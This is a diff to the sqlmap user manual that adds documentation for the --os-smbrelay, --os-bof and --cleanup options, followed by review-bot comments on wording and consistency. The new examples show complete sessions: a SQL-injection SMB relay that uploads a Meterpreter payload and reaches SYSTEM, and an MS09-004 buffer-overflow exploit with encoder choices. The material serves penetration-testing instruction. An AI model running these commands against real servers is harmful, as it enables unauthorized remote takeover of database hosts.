+Example on a Microsoft SQL Server 2005 Service Pack 0 running as +Administrator on the target: + + +$ sudo python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \ + --os-smbrelay -v 1 --msf-path /home/inquis/software/metasploit + +[...] +[hh:mm:11] [INFO] the back-end DBMS is Microsoft SQL Server +web server operating system: Windows 2000 +web application technology: ASP.NET, Microsoft IIS 6.0, ASP +back-end DBMS: Microsoft SQL Server 2005 + +[hh:mm:11] [INFO] testing stacked queries support on parameter 'name' +[hh:mm:16] [INFO] the web application supports stacked queries on parameter 'name' +[hh:mm:16] [WARNING] it is unlikely that this attack will be successful because often +Microsoft SQL Server 2005 runs as Network Service which is not a real user, it does not +send the NTLM session hash when connecting to a SMB service +[hh:mm:16] [INFO] which connection type do you want to use? +[1] Bind TCP (default) +[2] Bind TCP (No NX) +[3] Reverse TCP +[4] Reverse TCP (No NX) +> 1 +[hh:mm:16] [INFO] which is the local address? [192.168.1.161] 192.168.1.161 +[hh:mm:16] [INFO] which is the back-end DBMS address? [192.168.1.131] 192.168.1.131 +[hh:mm:16] [INFO] which remote port numer do you want to use? [4907] 4907 +[hh:mm:16] [INFO] which payload do you want to use? +[1] Reflective Meterpreter (default) +[2] PatchUp Meterpreter (only from Metasploit development revision 6742) +[3] Shell +[4] Reflective VNC +[5] PatchUp VNC (only from Metasploit development revision 6742) +> 1 +[hh:mm:16] [INFO] which SMB port do you want to use? +[1] 139/TCP (default) +[2] 445/TCP +> 1 +[hh:mm:16] [INFO] running Metasploit Framework 3 console locally, wait.. 
+ + _ _ _ _ + | | | | (_) | + _ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_ +| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __| +| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_ +|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__| + | | + |_| + + + =[ msf v3.3-dev ++ -- --=[ 392 exploits - 234 payloads ++ -- --=[ 20 encoders - 7 nops + =[ 168 aux + +resource> use windows/smb/smb_relay +resource> set SRVHOST 192.168.1.161 +SRVHOST => 192.168.1.161 +resource> set SRVPORT 139 +SRVPORT => 139 +resource> set PAYLOAD windows/meterpreter/bind_tcp +PAYLOAD => windows/meterpreter/bind_tcp +resource> set LPORT 4907 +LPORT => 4907 +resource> set RHOST 192.168.1.131 +RHOST => 192.168.1.131 +resource> exploit +[*] Exploit running as background job. +msf exploit(smb_relay) > +[*] Started bind handler +[*] Server started. +[*] Received 192.168.1.131:3242 \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 +Service Pack 2 LM: +[*] Sending Access Denied to 192.168.1.131:3242 \ +[*] Received 192.168.1.131:3242 W2K3DEV\Administrator LMHASH:FOO NTHASH:BAR OS:Windows +Server 2003 3790 Service Pack 2 LM: +[*] Authenticating to 192.168.1.131 as W2K3DEV\Administrator... +[*] AUTHENTICATED as W2K3DEV\Administrator... +[*] Connecting to the ADMIN$ share... +[*] Regenerating the payload... +[*] Uploading payload... +[*] Created \wELRmcmd.exe... +[*] Connecting to the Service Control Manager... +[*] Obtaining a service manager handle... +[*] Creating a new service... +[*] Closing service handle... +[*] Opening service... +[*] Starting the service... +[*] Removing the service... +[*] Closing service handle... +[*] Deleting \wELRmcmd.exe... 
+[*] Sending Access Denied to 192.168.1.131:3242 W2K3DEV\Administrator +[*] Transmitting intermediate stager for over-sized stage...(216 bytes) +[*] Received 192.168.1.131:3244 \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 +Service Pack 2 LM: +[*] Sending Access Denied to 192.168.1.131:3244 \ +[*] Received 192.168.1.131:3244 W2K3DEV\Administrator LMHASH:FOO NTHASH:BAR OS:Windows +Server 2003 3790 Service Pack 2 LM: +[*] Authenticating to 192.168.1.131 as W2K3DEV\Administrator... +[*] AUTHENTICATED as W2K3DEV\Administrator... +[*] Ignoring request from 192.168.1.131, attack already in progress. +[*] Sending Access Denied to 192.168.1.131:3244 W2K3DEV\Administrator +[*] Sending stage (718336 bytes) +[*] Meterpreter session 1 opened (192.168.1.161:51813 -> 192.168.1.131:4907) + +Active sessions +=============== + + Id Description Tunnel + -- ----------- ------ + 1 Meterpreter 192.168.1.161:51813 -> 192.168.1.131:4907 + +msf exploit(smb_relay) > [*] Starting interaction with 1... + +meterpreter > [-] The 'priv' extension has already been loaded. +meterpreter > getuid +Server username: NT AUTHORITY\SYSTEM +meterpreter > exit + +[*] Meterpreter session 1 closed. +msf exploit(smb_relay) > exit + +[*] Server stopped. + + Stored procedure buffer overflow exploitation @@ -4022,12 +4762,104 @@ The techniques implemented are detailed on the white paper Options: --os-bof, --priv-esc and --msf-path

-TODO +If the back-end database management system is not patched against Microsoft +Security Bulletin , +sqlmap can exploit the heap-based buffer overflow affecting +sp_replwritetovarbin stored procedure in order to establish an +out-of-band TCP stateful channel between the attacker host and the +target database server. +sqlmap has its own exploit to trigger the vulnerability, but it relies on + to +generate the shellcode used within the exploit, so you need to have it +already on your system: it's free and can be downloaded from the homepage.

-The techniques implemented are detailed on the white paper +Note that this feature is not supported by sqlmap running on Windows +because Metasploit's msfconsole and msfcli are not supported on the native +Windows Ruby interpreter. + +

+This technique is detailed on the white paper . +

+Example on a Microsoft SQL Server 2005 Service Pack 0 target: + + +$ sudo python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \ + --os-bof -v 1 --msf-path /home/inquis/software/metasploit + +[...] +[hh:mm:09] [INFO] the back-end DBMS is Microsoft SQL Server +web server operating system: Windows 2000 +web application technology: ASP.NET, Microsoft IIS 6.0, ASP +back-end DBMS: Microsoft SQL Server 2005 + +[hh:mm:09] [INFO] testing stacked queries support on parameter 'name' +[hh:mm:14] [INFO] the web application supports stacked queries on parameter 'name' +[hh:mm:14] [INFO] going to exploit the Microsoft SQL Server 2005 'sp_replwritetovarbin' +stored procedure heap-based buffer overflow (MS09-004) +[hh:mm:14] [INFO] fingerprinting the back-end DBMS operating system version and service pack +[hh:mm:14] [INFO] retrieved: 1 +[hh:mm:15] [INFO] retrieved: 1 +[hh:mm:15] [INFO] the back-end DBMS operating system is Windows 2003 Service Pack 2 +[hh:mm:15] [INFO] testing if current user is DBA +[hh:mm:15] [INFO] retrieved: 1 +[hh:mm:15] [INFO] checking if xp_cmdshell extended procedure is available, wait.. +[hh:mm:21] [INFO] xp_cmdshell extended procedure is available +[hh:mm:21] [INFO] creating Metasploit Framework 3 multi-stage shellcode for the exploit +which connection type do you want to use? +[1] Bind TCP (default) +[2] Bind TCP (No NX) +[3] Reverse TCP +[4] Reverse TCP (No NX) +> +which is the back-end DBMS address? [192.168.1.131] +which remote port numer do you want to use? [39391] 62719 +which payload do you want to use? +[1] Reflective Meterpreter (default) +[2] PatchUp Meterpreter (only from Metasploit development revision 6742) +[3] Shell +[4] Reflective VNC +[5] PatchUp VNC (only from Metasploit development revision 6742) +> +which payload encoding do you want to use? 
+[1] No Encoder +[2] Alpha2 Alphanumeric Mixedcase Encoder +[3] Alpha2 Alphanumeric Uppercase Encoder +[4] Avoid UTF8/tolower +[5] Call+4 Dword XOR Encoder +[6] Single-byte XOR Countdown Encoder +[7] Variable-length Fnstenv/mov Dword XOR Encoder +[8] Polymorphic Jump/Call XOR Additive Feedback Encoder +[9] Non-Alpha Encoder +[10] Non-Upper Encoder +[11] Polymorphic XOR Additive Feedback Encoder (default) +[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder +[13] Alpha2 Alphanumeric Unicode Uppercase Encoder +> +[hh:mm:50] [INFO] creation in progress .................. done +[hh:mm:08] [INFO] handling DEP +[hh:mm:08] [INFO] the back-end DBMS underlying operating system supports DEP: going to +handle it +[hh:mm:08] [INFO] checking DEP system policy +[hh:mm:09] [INFO] retrieved: OPTIN +[hh:mm:12] [INFO] only Windows system binaries are covered by DEP by default +[hh:mm:12] [INFO] running Metasploit Framework 3 command line interface locally, wait.. +[hh:mm:12] [INFO] triggering the buffer overflow vulnerability, wait.. +[*] Please wait while we load the module tree... +[*] Started bind handler +[*] Starting the payload handler... +[*] Transmitting intermediate stager for over-sized stage...(216 bytes) +[*] Sending stage (718336 bytes) +[*] Meterpreter session 1 opened (192.168.1.161:33765 -> 192.168.1.131:62719) + +meterpreter > Loading extension priv...success. +meterpreter > getuid +Server username: NT AUTHORITY\NETWORK SERVICE +meterpreter > exit + + Miscellaneous @@ -4123,7 +4955,7 @@ Option: --update

It is possible to update sqlmap to the latest stable version available on -its by running it with the --update option. @@ -4140,7 +4972,7 @@ $ python sqlmap.py --update -v 4 [hh:mm:55] [TRAFFIC OUT] HTTP request: GET /doc/VERSION HTTP/1.1 Host: sqlmap.sourceforge.net -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:55] [TRAFFIC IN] HTTP response (OK - 200): @@ -4159,7 +4991,7 @@ X-Pad: avoid browser bug [hh:mm:56] [TRAFFIC OUT] HTTP request: GET /FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx HTTP/1.1 Host: www.sqlsecurity.com -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Cookie: .ASPXANONYMOUS=dvus03cqyQEkAAAANDI0M2QzZmUtOGRkOS00ZDQxLThhMTUtN2ExMWJiNWVjN2My0; language=en-US Connection: close @@ -4478,7 +5310,32 @@ vulnerable parameter which is the default behaviour. Option: --cleanup

-This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper for the moment. +It is recommended to clean up the back-end database management system from +sqlmap temporary tables and created user-defined functions when you are +done with owning the underlying operating system or file system. + +

+Example on a PostgreSQL 8.3.5 target: + + +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/iis/get_int.aspx?id=1" \ + -v 2 --cleanup + +[...] +[hh:mm:18] [INFO] cleaning up the database management system +[hh:mm:18] [DEBUG] removing support tables +[hh:mm:18] [DEBUG] query: DROP TABLE sqlmapfile +[hh:mm:18] [DEBUG] query: DROP TABLE sqlmapoutput +do you want to remove sys_exec UDF? [Y/n] +[hh:mm:20] [DEBUG] removing sys_exec UDF +[hh:mm:20] [DEBUG] query: DROP FUNCTION sys_exec(text) +do you want to remove sys_eval UDF? [Y/n] +[hh:mm:21] [DEBUG] removing sys_eval UDF +[hh:mm:21] [DEBUG] query: DROP FUNCTION sys_eval(text) +[hh:mm:21] [INFO] database management system cleanup finished +[hh:mm:21] [WARNING] remember that UDF shared library files saved on the file system can +only be deleted manually + Disclaimer
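Review bot: In the --union-use example for --os-shell, the command line targets /sqlmap/mysql/get_int.aspx but the "valid union:" line in the pasted output shows /sqlmap/mysql/iis/get_int.aspx, so the command and the output do not come from the same run; use one URL in both places. Both --os-shell runs also answer "n" to "do you want to remove sys_exec UDF?" and "do you want to remove sys_eval UDF?", which leaves the two functions installed on the target, and the closing paragraph should say so and point to --cleanup. In that same paragraph, "sqlmap firstly check" should read "sqlmap first checks".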
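Review bot: The --os-pwn section never says what happens to the files it writes on the database server. Both examples show a payload stager uploaded under C:/WINDOWS/Temp, and the --priv-esc run also uploads Churrasco, but neither the prose nor the output shows them being deleted. Add a sentence stating whether sqlmap removes them when the session ends or whether, like the UDF library files named in the --cleanup warning, they have to be deleted by hand. Smaller points in the same hunk: the --priv-esc output switches from the hh:mm placeholder to real clock values ("[14:10:06] [INFO] file chunk 2 written" through "[14:11:01]"), "PostgreSQL run as" should be "runs as", and "extension to abused Windows access tokens in conjunction to Churrasco" should be "to abuse ... in conjunction with".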
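Review bot: The --os-smbrelay paragraph justifies the root requirement with "a user-specified SMB TCP port", but the prompt in the example offers only 139/TCP and 445/TCP. Say that root is needed because both choices are privileged ports, so the reader understands why sudo appears in the command. The example is also introduced as a target "running as Administrator" while the output prints the warning that the attack is unlikely to succeed because SQL Server 2005 often runs as Network Service; one sentence explaining why that warning appears on this target would avoid confusion.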
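Review bot: The --os-bof example is run with "sudo python sqlmap.py", but unlike the --os-smbrelay section nothing here says root is required, and the run uses the default bind TCP connection to the target rather than a local listener. Drop sudo from the command or state why it is needed. The Options line also lists --priv-esc, yet the added text never mentions it and the sample session ends as NT AUTHORITY\NETWORK SERVICE; add a sentence on how --priv-esc applies to this technique. The "not supported by sqlmap running on Windows" note is now pasted verbatim into three sections and could be stated once.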
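Review bot: The new --cleanup paragraph promises removal of "temporary tables and created user-defined functions", but the only place a reader learns that the UDF shared library files stay on disk is the [WARNING] line at the end of the sample output. State that limitation in the prose, since it is what an operator has to follow up on manually after the run. "when you are done with owning the underlying operating system" is also out of register with the rest of the document; "taking over" matches the wording used elsewhere.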